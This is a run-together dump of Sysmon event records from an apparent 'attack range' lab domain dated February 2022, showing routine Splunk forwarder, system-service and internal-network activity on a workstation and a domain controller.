Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215375Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.194{4F8D34B0-0FE1-6216-2604-000000003902}3412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215406Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:46.366{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39931B82DFA061A973F85C6D223AACF1,SHA256=E0D7736D609AFB15846CB2F1D3228F3DAEAE53A0EB288407C6E5D0752920C348,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:46.560{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:46.560{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:46.404{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:46.404{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:46.404{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000286470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:44.177{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53337-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000286469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:44.177{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53337-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 23542300x8000000000000000286468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:46.138{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99FA4F12B4B1F2B1BD7BD054D145CDE6,SHA256=646FE5BD2BB55DF41D3E88F967ABE85C73BB8F18F763B87044106D743F27509E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215405Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:46.209{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD7AB0B5308C3313EF44447BC412030E,SHA256=91632B284E1D4952A1C2A48127E030112D1FF6634DC413DB3B8210D95AF91E5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215404Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:46.209{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F716AB2E6DC0C030A835D37827C4743D,SHA256=80542BF22912F2DA9D52931576314EFC87DCD793172BC13EB871E546ADF7FD84,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215423Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.523{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51257-false10.0.1.12-8000- 354300x8000000000000000215422Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.258{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51256-false10.0.1.12-8089- 23542300x8000000000000000215421Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:47.590{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-127MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215420Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:47.477{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F52E1C1581C98391C4754B60D245E61,SHA256=AAF54FC251FE364E167AB0DA411CB80A9DBF41C5D9CADE68610041BC32A0DA62,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:45.034{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53338-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:45.034{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53338-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000286476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:47.216{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC3D5E4C69F0CE6A5BF17E9D7D46CADB,SHA256=1DE4B59EF7BBBE730BDED31AF9175CA4832C3FC11435B81438B4393D44CA559A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215419Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:47.383{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0FE3-6216-2804-000000003902}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215418Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:47.383{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215417Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:47.383{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215416Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:47.383{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215415Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:47.383{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215414Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:47.383{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215413Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:47.383{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215412Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:47.383{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215411Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:47.383{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215410Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:47.383{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215409Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:47.383{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0FE3-6216-2804-000000003902}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215408Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:47.383{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0FE3-6216-2804-000000003902}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215407Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:47.384{4F8D34B0-0FE3-6216-2804-000000003902}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215440Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.618{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD7AB0B5308C3313EF44447BC412030E,SHA256=91632B284E1D4952A1C2A48127E030112D1FF6634DC413DB3B8210D95AF91E5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215439Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.596{4F8D34B0-F133-6215-6C00-000000003902}2564NT 